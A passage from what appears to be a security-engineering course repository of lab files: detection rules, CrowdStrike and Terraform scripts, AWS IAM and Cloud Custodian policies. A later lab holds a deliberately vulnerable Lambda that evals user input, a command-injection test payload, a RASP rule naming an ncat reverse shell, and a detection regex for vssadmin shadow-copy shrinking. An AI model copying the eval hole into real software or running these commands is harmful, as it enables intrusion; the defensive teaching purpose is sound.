67 | #call function with parameters
68 | response = uploadioc(BODY, api_id, api_secret)
69 | print(response)
70 |
71 |
72 | exit()
--------------------------------------------------------------------------------
/chapter-02/lab-2.4/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | crowdstrike-falconpy==1.3.5
4 | idna==3.6
5 | requests==2.31.0
6 | urllib3==2.1.0
7 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.5/ag_ioc_sha256_hash_vt_basic.yar.yml:
--------------------------------------------------------------------------------
1 | rule ag_ioc_sha256_hash_vt_basic {
2 |
3 | meta:
4 | author = "Google Cloud Security"
5 | description = "Used for the Alert Graph Workshop. Detect file/process events with watchlisted hashes from MISP that VT flagged as MS Office docx file types"
6 | type = "alert"
7 | tags = "threat indicators, vt enrichment"
8 | assumption = "Assumes MISP data has been ingested into entity graph; this rule can be modified to utilize other TI indicators"
9 | data_source = "microsoft sysmon"
10 | severity = "Medium"
11 | priority = "Medium"
12 |
13 | events:
14 | $process.metadata.event_type = "PROCESS_LAUNCH" or $process.metadata.event_type ="FILE_CREATION"
15 | $process.principal.hostname = $hostname
16 | $process.target.process.file.sha256 != ""
17 | $process.target.process.file.sha256 = $sha256
18 |
19 | // Enriched field from VirusTotal integration, can be commented out or modified if not using
20 | $process.target.process.file.file_type = "FILE_TYPE_DOCX"
21 |
22 | // Correlates with MISP data; can be modified based on your MISP parser or other TI
23 | $ioc.graph.metadata.product_name = "MISP"
24 | $ioc.graph.metadata.entity_type = "FILE"
25 | $ioc.graph.metadata.source_type = "ENTITY_CONTEXT"
26 | $ioc.graph.entity.file.sha256 = $sha256
27 |
28 | match:
29 | $hostname over 30m
30 |
31 | outcome:
32 | $risk_score = max(65)
33 | $event_count = count_distinct($process.metadata.id)
34 |
35 | condition:
36 | $process and $ioc
37 | }
38 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.5/rule_multiple_connections_ru_cti.yar.yml:
--------------------------------------------------------------------------------
1 | rule rule_multiple_connections_ru_cti {
2 | meta:
3 | author = "foo"
4 | description = "bar"
5 | severity = "Medium"
6 |
7 | events:
8 | //Implied logical AND between lines back to object "e"
9 | $e.metadata.event_type = "NETWORK_HTTP"
10 | $e.target.ip_geo_artifact.location.country_or_region = "Russia"
11 | $e.target.hostname = $hostname
12 | //match against known the MISP threat intel sources for domains
13 | $ioc.graph.metadata.product_name = "MISP"
14 | $ioc.graph.metadata.entity_type = "DOMAIN_NAME"
15 | $ioc.graph.metadata.source_type = "ENTITY_CONTEXT"
16 | //setup the variable to correlate the target.hostname event
17 | $ioc.graph.entity.hostname = $hostname
18 |
19 | match:
20 | $hostname over 15m
21 |
22 | outcome:
23 | $risk_score = 10
24 | $event_count = count_distinct($hostname)
25 |
26 | condition:
27 | ($ioc and $e) and $event_count >=2
28 | }
29 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
8 | def uploadioa(ioc_body):
9 | BODY = ioc_body
10 | response = falcon.command("create_rule",
11 | retrodetects=False,
12 | ignore_warnings=True,
13 | body=BODY
14 | )
15 | #print(response)
16 | return response
17 |
18 | if __name__ == '__main__':
19 | parser = argparse.ArgumentParser(
20 | prog='custom-ioa-cs',
21 | description='Takes JSON formatted payload for a custom IOA',
22 | epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
23 | )
24 | parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
25 | parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
26 | args = parser.parse_args()
27 |
28 | #assign secrets from env variables or arguments from CLI
29 | CLIENT_ID = args.id
30 | CLIENT_SECRET = args.secret
31 |
32 |
33 | #client setup do outside of function so you arent using against call quotas each post
34 | falcon = APIHarnessV2(client_id=CLIENT_ID,
35 | client_secret=CLIENT_SECRET
36 | )
37 |
38 | #construct body read from external file like a real CI
39 | file_handle = open('test-rule-import.json', 'r')
40 | BODY = json.loads(file_handle.read())
41 | #print(type(BODY))
42 | #print(BODY)
43 |
44 | #call function with parameters
45 |
46 | response = uploadioa(BODY)
47 | json_response = json.dumps(response)
48 | print(json_response)
49 |
50 |
51 | exit()
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/get-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from falconpy import APIHarnessV2
4 |
5 | CLIENT_ID = os.getenv('CS_CLIENT_ID')
6 | CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')
7 |
8 | # Do not hardcode API credentials!
9 | falcon = APIHarnessV2(client_id=CLIENT_ID,
10 | client_secret=CLIENT_SECRET
11 | )
12 |
13 | BODY = {
14 | "ids": ["1"]
15 | }
16 |
17 | response = falcon.command("get_rules_get", body=BODY)
18 | #print(type(response))
19 | json_response = json.dumps(response)
20 | print(json_response)
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | crowdstrike-falconpy==1.3.5
4 | idna==3.6
5 | requests==2.31.0
6 | urllib3==2.1.0
7 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.2/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 SCIS Security
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/README.md:
--------------------------------------------------------------------------------
1 | # terraform-cloudflare-waf-demo
2 | A demo repo of utilizing the Github VCS with terraform cloud as the runner.
3 |
4 | track change test
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/local-tf-repo/main.tf:
--------------------------------------------------------------------------------
1 | terraform {
2 | required_providers {
3 | cloudflare = {
4 | source = "cloudflare/cloudflare"
5 | version = "4.20.0"
6 | }
7 | }
8 | }
9 |
10 |
11 | # Define null variables that are injected by terraform cloud
12 | variable "CLOUDFLARE_API_TOKEN" {
13 | type= string
14 | }
15 | variable "CLOUDFLARE_EMAIL" {
16 | type = string
17 | }
18 | variable "CLOUDFLARE_ZONE_ID" {
19 | type = string
20 | }
21 |
22 |
23 | provider "cloudflare" {
24 | # Pull from tf cloud workspace level variables set to enviornment #
25 | #api_tokens are used but provider still expects api_key as of 2023-dec-22 commenting out for now
26 | #api_token = "${var.CLOUDFLARE_API_TOKEN}"
27 | #email = "${var.CLOUDFLARE_EMAIL}"
28 |
29 | }
30 |
31 | #New rule
32 | #Syntax details https://registry.terraform.io/providers/cloudflare/cloudflare/latest/docs/resources/ruleset
33 | resource "cloudflare_ruleset" "terraform_managed_resource_a93d3538be3d47c18220ae2d995a8a4b" {
34 | kind = "zone"
35 | name = "example test rule from dashboard"
36 | phase = "http_request_firewall_custom"
37 | zone_id = "${var.CLOUDFLARE_ZONE_ID}"
38 | rules {
39 | action = "managed_challenge"
40 | description = "test"
41 | enabled = false
42 | expression = "(http.request.method eq \"PATCH\" and http.referer eq \"google.com\")"
43 | }
44 | }
45 | /*
46 | #additional rule
47 | resource "cloudflare_ruleset" "zone_custom_firewall" {
48 | zone_id = var.CLOUDFLARE_ZONE_ID
49 | name = "prevent non web traffic on alt ports"
50 | description = "terraform update 1"
51 | kind = "zone"
52 | phase = "http_request_firewall_custom"
53 |
54 | rules {
55 | action = "managed_challenge"
56 | expression = "(not cf.edge.server_port in {80 443})"
57 | description = "Block ports other than 80 and 443"
58 | enabled = false
59 | }
60 | }
61 | */
62 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.3/wiz-threat-rule-example.tf:
--------------------------------------------------------------------------------
1 | terraform {
2 | required_providers {
3 | wiz = {
4 | source = "tf.app.wiz.io/wizsec/wiz"
5 | version = "~> 1.3"
6 | }
7 | }
8 | }
9 |
10 | resource "wiz_threat_detection_rule" "test" {
11 | name = "dennis-test_tdr"
12 | description = "This is a test TDR"
13 | severity = "LOW"
14 | target_event_names = ["GuardDuty: UnauthorizedAccess:EC2/SSHBruteForce"]
15 | security_sub_categories = ["wsct-id-9468", "wsct-id-9469"]
16 | opa_matcher = "match { input.RawEventName == 'UnauthorizedAccess:EC2/SSHBruteForce'; input.RawJson.Service.Archived == false }"
17 | cloud_providers = ["AWS"]
18 | generate_findings = false
19 | generate_issues = false
20 | }
21 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/aws-iam-cloud-custodian-deploy-lambda-policy.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "VisualEditor0",
6 | "Effect": "Allow",
7 | "Action": [
8 | "lambda:CreateFunction",
9 | "lambda:TagResource",
10 | "cloudwatch:PutMetricData",
11 | "events:PutRule",
12 | "lambda:GetFunctionConfiguration",
13 | "lambda:CreateEventSourceMapping",
14 | "lambda:UntagResource",
15 | "lambda:PutFunctionConcurrency",
16 | "iam:PassRole",
17 | "logs:CreateLogStream",
18 | "ec2:DescribeNetworkInterfaces",
19 | "lambda:DeleteFunction",
20 | "events:ListTargetsByRule",
21 | "events:DescribeRule",
22 | "lambda:UpdateEventSourceMapping",
23 | "lambda:InvokeFunction",
24 | "lambda:GetFunction",
25 | "lambda:UpdateFunctionConfiguration",
26 | "ec2:DeleteNetworkInterface",
27 | "lambda:GetFunctionUrlConfig",
28 | "logs:CreateLogGroup",
29 | "logs:PutLogEvents",
30 | "lambda:GetFunctionCodeSigningConfig",
31 | "lambda:UpdateAlias",
32 | "ec2:CreateNetworkInterface",
33 | "lambda:UpdateFunctionCode",
34 | "events:PutTargets",
35 | "lambda:AddPermission",
36 | "lambda:GetFunctionConcurrency",
37 | "lambda:GetFunctionEventInvokeConfig",
38 | "lambda:DeleteAlias",
39 | "lambda:DeleteFunctionConcurrency",
40 | "lambda:DeleteEventSourceMapping",
41 | "lambda:RemovePermission",
42 | "lambda:CreateAlias"
43 | ],
44 | "Resource": "*"
45 | }
46 | ]
47 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/aws-iam-cloud-custodian-s3-lambdas-policy.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "Stmt1703559105132",
6 | "Action": [
7 | "s3:DeleteBucketPolicy",
8 | "s3:GetBucketAcl",
9 | "s3:GetBucketPolicy",
10 | "s3:GetBucketPolicyStatus",
11 | "s3:GetBucketPublicAccessBlock",
12 | "s3:GetDataAccess",
13 | "s3:GetEncryptionConfiguration",
14 | "s3:GetObject",
15 | "s3:GetObjectAcl",
16 | "s3:ListAccessGrants",
17 | "s3:ListAccessGrantsInstances",
18 | "s3:ListAccessGrantsLocations",
19 | "s3:ListAllMyBuckets",
20 | "s3:ListBucket",
21 | "s3:PutAccessGrantsInstanceResourcePolicy",
22 | "s3:PutAccessPointPolicy",
23 | "s3:PutAccessPointPublicAccessBlock",
24 | "s3:PutAccountPublicAccessBlock",
25 | "s3:PutBucketAcl",
26 | "s3:PutBucketPolicy"
27 | ],
28 | "Effect": "Allow",
29 | "Resource": "*"
30 | }
31 | ]
32 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/cfn-configure-aws-credentials-latest.yml:
--------------------------------------------------------------------------------
1 | Parameters:
2 | GitHubOrg:
3 | Description: Name of GitHub organization/user (case sensitive)
4 | Type: String
5 | RepositoryName:
6 | Description: Name of GitHub repository (case sensitive)
7 | Type: String
8 | OIDCProviderArn:
9 | Description: Arn for the GitHub OIDC Provider. (optional)
10 | Default: ""
11 | Type: String
12 | OIDCAudience:
13 | Description: Audience supplied to configure-aws-credentials.
14 | Default: "sts.amazonaws.com"
15 | Type: String
16 |
17 | Conditions:
18 | CreateOIDCProvider: !Equals
19 | - !Ref OIDCProviderArn
20 | - ""
21 |
22 | Resources:
23 | Role:
24 | Type: AWS::IAM::Role
25 | Properties:
26 | AssumeRolePolicyDocument:
27 | Statement:
28 | - Effect: Allow
29 | Action: sts:AssumeRoleWithWebIdentity
30 | Principal:
31 | Federated: !If
32 | - CreateOIDCProvider
33 | - !Ref GithubOidc
34 | - !Ref OIDCProviderArn
35 | Condition:
36 | StringEquals:
37 | token.actions.githubusercontent.com:aud: !Ref OIDCAudience
38 | StringLike:
39 | token.actions.githubusercontent.com:sub: !Sub repo:${GitHubOrg}/${RepositoryName}:*
40 |
41 | GithubOidc:
42 | Type: AWS::IAM::OIDCProvider
43 | Condition: CreateOIDCProvider
44 | Properties:
45 | Url: https://token.actions.githubusercontent.com
46 | ClientIdList:
47 | - sts.amazonaws.com
48 | ThumbprintList:
49 | - ffffffffffffffffffffffffffffffffffffffff
50 |
51 | Outputs:
52 | Role:
53 | Value: !GetAtt Role.Arn
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/custodian-s3-policy.yml:
--------------------------------------------------------------------------------
1 | ### S3 Related ###
2 | policies:
3 | - name: s3-bucket-encryption-policy-absent
4 | resource: s3
5 | mode:
6 | type: periodic
7 | schedule: "rate(1 hour)"
8 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
9 | execution-options:
10 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
11 | metrics: aws
12 | description: s3 buckets without encryption required and re-enable encryption
13 | filters:
14 | - type: no-encryption-statement
15 | actions:
16 | - type: set-bucket-encryption
17 | crypto: AES256
18 | enabled: True
19 | - type: tag
20 | tag: secops
21 | value: remediated
22 | - name: s3-bucket-public-block-absent
23 | resource: s3
24 | mode:
25 | type: periodic
26 | schedule: "rate(1 hour)"
27 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
28 | execution-options:
29 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
30 | metrics: aws
31 | description: s3 buckets without public access blocked are re-enabled
32 | filters:
33 | - type: check-public-block
34 | BlockPublicAcls: true
35 | BlockPublicPolicy: true
36 | actions:
37 | - type: set-public-block
38 | BlockPublicAcls: true
39 | BlockPublicPolicy: true
40 | - type: tag
41 | tag: secops
42 | value: remediated
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/deploy-to-aws-cloud-custodian.yml:
--------------------------------------------------------------------------------
1 | # Ref: https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/
2 | # Ref2: https://github.com/aws-actions/configure-aws-credentials
3 | # Ref3" https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services
4 |
5 | # Use OIDC connection to AWS account and assume role
6 | name: Connect to an AWS role from a GitHub repository
7 |
8 | # Controls when the action will run. Invokes the workflow on push events but only for the main branch
9 | on:
10 | push:
11 | branches: [ main ]
12 | pull_request:
13 | branches: [ main ]
14 |
15 | env:
16 |
17 | AWS_REGION : "us-east-2" #Change to reflect your Region
18 |
19 | # Permission can be added at job level or workflow level
20 | permissions:
21 | id-token: write # This is required for requesting the JWT
22 | contents: read # This is required for actions/checkout
23 | jobs:
24 | InstallPythonAssumeIAMRole:
25 | runs-on: ubuntu-latest
26 | steps:
27 | - name: Git clone the repository
28 | uses: actions/checkout@v4
29 | - name: configure aws credentials
30 | uses: aws-actions/configure-aws-credentials@v4
31 | with:
32 | role-to-assume: arn:aws:iam:::role/GithubOIDC-Actions-Role- #change to reflect your IAM role’s ARN
33 | role-session-name: GitHub_to_AWS_via_FederatedOIDC
34 | aws-region: ${{ env.AWS_REGION }}
35 | - name: Deploy Clud Custodian Policy
36 | uses: actions/setup-python@v5
37 | with:
38 | python-version: '3.10'
39 | - run: pip install c7n
40 | - name: Validate Cloud Custodian Policy
41 | run: |
42 | custodian validate ./sample-policy.yml
43 | run: |
44 | custodian run --region us-east-2 --verbose ./sample-policy.yml -s ./out-log/
45 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/oidc-trust-aws.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2008-10-17",
3 | "Statement": [
4 | {
5 | "Effect": "Allow",
6 | "Principal": {
7 | "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com"
8 | },
9 | "Action": "sts:AssumeRoleWithWebIdentity",
10 | "Condition": {
11 | "StringEquals": {
12 | "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
13 | },
14 | "StringLike": {
15 | "token.actions.githubusercontent.com:sub": "repo:/:*"
16 | }
17 | }
18 | }
19 | ]
20 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.4/sample-policy.yml:
--------------------------------------------------------------------------------
1 | ### S3 Related ###
2 | policies:
3 | - name: s3-bucket-encryption-policy-absent
4 | resource: s3
5 | mode:
6 | type: periodic
7 | schedule: "rate(1 hour)"
8 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
9 | execution-options:
10 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
11 | metrics: aws
12 | description: s3 buckets without encryption required and re-enable encryption
13 | filters:
14 | - type: no-encryption-statement
15 | actions:
16 | - type: set-bucket-encryption
17 | crypto: AES256
18 | enabled: True
19 | - type: tag
20 | tag: secops
21 | value: remediated
22 | - name: s3-bucket-public-block-absent
23 | resource: s3
24 | mode:
25 | type: periodic
26 | schedule: "rate(1 hour)"
27 | role: arn:aws:iam:::role/cloud-custodian-role-deploy-lambdas
28 | execution-options:
29 | assume_role: arn:aws:iam:::role/cloud-custodian-role-s3-lambda
30 | metrics: aws
31 | description: s3 buckets without public access blocked are re-enabled
32 | filters:
33 | - type: check-public-block
34 | BlockPublicAcls: true
35 | BlockPublicPolicy: true
36 | actions:
37 | - type: set-public-block
38 | BlockPublicAcls: true
39 | BlockPublicPolicy: true
40 | - type: tag
41 | tag: secops
42 | value: remediated
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/aws-lambda-sample-rce-payload.json:
--------------------------------------------------------------------------------
1 | {
2 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
3 | "resource": "/{proxy+}",
4 | "path": "/path/to/resource",
5 | "httpMethod": "POST",
6 | "isBase64Encoded": true,
7 | "queryStringParameters": {
8 | "calc": "exec('import subprocess') or subprocess.run(['ls', '-l'], capture_output=True)"
9 | },
10 | "multiValueQueryStringParameters": {
11 | "foo": [
12 | "bar"
13 | ]
14 | },
15 | "pathParameters": {
16 | "proxy": "/path/to/resource"
17 | },
18 | "stageVariables": {
19 | "baz": "qux"
20 | },
21 | "headers": {
22 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
23 | "Accept-Encoding": "gzip, deflate, sdch",
24 | "Accept-Language": "en-US,en;q=0.8",
25 | "Cache-Control": "max-age=0",
26 | "CloudFront-Forwarded-Proto": "https",
27 | "CloudFront-Is-Desktop-Viewer": "true",
28 | "CloudFront-Is-Mobile-Viewer": "false",
29 | "CloudFront-Is-SmartTV-Viewer": "false",
30 | "CloudFront-Is-Tablet-Viewer": "false",
31 | "CloudFront-Viewer-Country": "US",
32 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
33 | "Upgrade-Insecure-Requests": "1",
34 | "User-Agent": "Custom User Agent String",
35 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
36 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
37 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
38 | "X-Forwarded-Port": "443",
39 | "X-Forwarded-Proto": "https"
40 | },
41 | "multiValueHeaders": {
42 | "Accept": [
43 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
44 | ],
45 | "Accept-Encoding": [
46 | "gzip, deflate, sdch"
47 | ],
48 | "Accept-Language": [
49 | "en-US,en;q=0.8"
50 | ],
51 | "Cache-Control": [
52 | "max-age=0"
53 | ],
54 | "CloudFront-Forwarded-Proto": [
55 | "https"
56 | ],
57 | "CloudFront-Is-Desktop-Viewer": [
58 | "true"
59 | ],
60 | "CloudFront-Is-Mobile-Viewer": [
61 | "false"
62 | ],
63 | "CloudFront-Is-SmartTV-Viewer": [
64 | "false"
65 | ],
66 | "CloudFront-Is-Tablet-Viewer": [
67 | "false"
68 | ],
69 | "CloudFront-Viewer-Country": [
70 | "US"
71 | ],
72 | "Host": [
73 | "0123456789.execute-api.us-east-1.amazonaws.com"
74 | ],
75 | "Upgrade-Insecure-Requests": [
76 | "1"
77 | ],
78 | "User-Agent": [
79 | "Custom User Agent String"
80 | ],
81 | "Via": [
82 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
83 | ],
84 | "X-Amz-Cf-Id": [
85 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
86 | ],
87 | "X-Forwarded-For": [
88 | "127.0.0.1, 127.0.0.2"
89 | ],
90 | "X-Forwarded-Port": [
91 | "443"
92 | ],
93 | "X-Forwarded-Proto": [
94 | "https"
95 | ]
96 | },
97 | "requestContext": {
98 | "accountId": "123456789012",
99 | "resourceId": "123456",
100 | "stage": "prod",
101 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
102 | "requestTime": "09/Apr/2015:12:34:56 +0000",
103 | "requestTimeEpoch": 1428582896000,
104 | "identity": {
105 | "cognitoIdentityPoolId": null,
106 | "accountId": null,
107 | "cognitoIdentityId": null,
108 | "caller": null,
109 | "accessKey": null,
110 | "sourceIp": "127.0.0.1",
111 | "cognitoAuthenticationType": null,
112 | "cognitoAuthenticationProvider": null,
113 | "userArn": null,
114 | "userAgent": "Custom User Agent String",
115 | "user": null
116 | },
117 | "path": "/prod/path/to/resource",
118 | "resourcePath": "/{proxy+}",
119 | "httpMethod": "POST",
120 | "apiId": "1234567890",
121 | "protocol": "HTTP/1.1"
122 | }
123 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/example-custom-rasp-rule.json:
--------------------------------------------------------------------------------
1 | {
2 | "exec_control": {
3 | "configuration": {
4 | "rules": [
5 | {
6 | "action": "block",
7 | "command": "ncat --udp 10.10.10.10 53 -e /bin/bash"
8 | }
9 | ]
10 | },
11 | "status": "enabled"
12 | }
13 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/insecure_lamda_example.py:
--------------------------------------------------------------------------------
1 | #some vulnerable function to command injection from an API gateway query parameters
2 | #To extend this test case: persistent payload return PoC runtime replacement: https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/
3 |
4 | #Uncommon modules need layer import
5 | #mkdir python && python3 -m 'venv' ./ && source ./bin/activate && pip install seval -t python && zip seval-layer.zip python
6 | #aws lambda publish-layer-version --layer-name seval-layerr --zip-file fileb://seval-layer.zip --compatible-runtimes python3.9 --region us-east-1
7 |
8 | import trend_app_protect.start
9 | from trend_app_protect.api.aws_lambda import protect_handler
10 | #import seval
11 | @protect_handler
12 | def lambda_handler(event, context):
13 | #pretend we have a valid API with a parameter of calc
14 | calcexpr = str(event["queryStringParameters"]["calc"])
15 | print("*****")
16 | print("This is the input from user: " +calcexpr)
17 | print("*****")
18 |
19 | #simple pass-listing is not enough sometimes
20 | mathchars = ['*', '+', '/', '**', '-', '(', ')']
21 | subsearch = any(i in calcexpr for i in mathchars)
22 | if len(calcexpr) == 0:
23 | print("Error, you need to enter something")
24 | raise("Null input")
25 | elif subsearch == False:
26 | print("Error, you didn't enter a valid math expression")
27 | raise AssertionError("Invalid Expression")
28 |
29 | elif subsearch == True:
30 | #dangerous eval without.
31 | result = str(eval(calcexpr))
32 |
33 | #more secure using module filters
34 | #result = str(eval(calcexpr,{"__builtins__":None}))
35 |
36 | #More secure alternatives however e.g bandit's ast.literal_eval() however...
37 | #Python 3.7.x+ Addition and subtraction of arbitrary numbers are no longer allowed. (Contributed by Serhiy Storchaka in bpo-31778.)
38 | #result = seval.safe_eval(calcexpr)
39 |
40 | return result
41 |
42 |
43 | #Harmless Payload
44 | '''
45 | {
46 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
47 | "resource": "/{proxy+}",
48 | "path": "/path/to/resource",
49 | "httpMethod": "POST",
50 | "isBase64Encoded": true,
51 | "queryStringParameters": {
52 | "calc": "2+2"
53 | },
54 | "multiValueQueryStringParameters": {
55 | "foo": [
56 | "bar"
57 | ]
58 | },
59 | "pathParameters": {
60 | "proxy": "/path/to/resource"
61 | },
62 | "stageVariables": {
63 | "baz": "qux"
64 | },
65 | "headers": {
66 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
67 | "Accept-Encoding": "gzip, deflate, sdch",
68 | "Accept-Language": "en-US,en;q=0.8",
69 | "Cache-Control": "max-age=0",
70 | "CloudFront-Forwarded-Proto": "https",
71 | "CloudFront-Is-Desktop-Viewer": "true",
72 | "CloudFront-Is-Mobile-Viewer": "false",
73 | "CloudFront-Is-SmartTV-Viewer": "false",
74 | "CloudFront-Is-Tablet-Viewer": "false",
75 | "CloudFront-Viewer-Country": "US",
76 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
77 | "Upgrade-Insecure-Requests": "1",
78 | "User-Agent": "Custom User Agent String",
79 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
80 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
81 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
82 | "X-Forwarded-Port": "443",
83 | "X-Forwarded-Proto": "https"
84 | },
85 | "multiValueHeaders": {
86 | "Accept": [
87 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
88 | ],
89 | "Accept-Encoding": [
90 | "gzip, deflate, sdch"
91 | ],
92 | "Accept-Language": [
93 | "en-US,en;q=0.8"
94 | ],
95 | "Cache-Control": [
96 | "max-age=0"
97 | ],
98 | "CloudFront-Forwarded-Proto": [
99 | "https"
100 | ],
101 | "CloudFront-Is-Desktop-Viewer": [
102 | "true"
103 | ],
104 | "CloudFront-Is-Mobile-Viewer": [
105 | "false"
106 | ],
107 | "CloudFront-Is-SmartTV-Viewer": [
108 | "false"
109 | ],
110 | "CloudFront-Is-Tablet-Viewer": [
111 | "false"
112 | ],
113 | "CloudFront-Viewer-Country": [
114 | "US"
115 | ],
116 | "Host": [
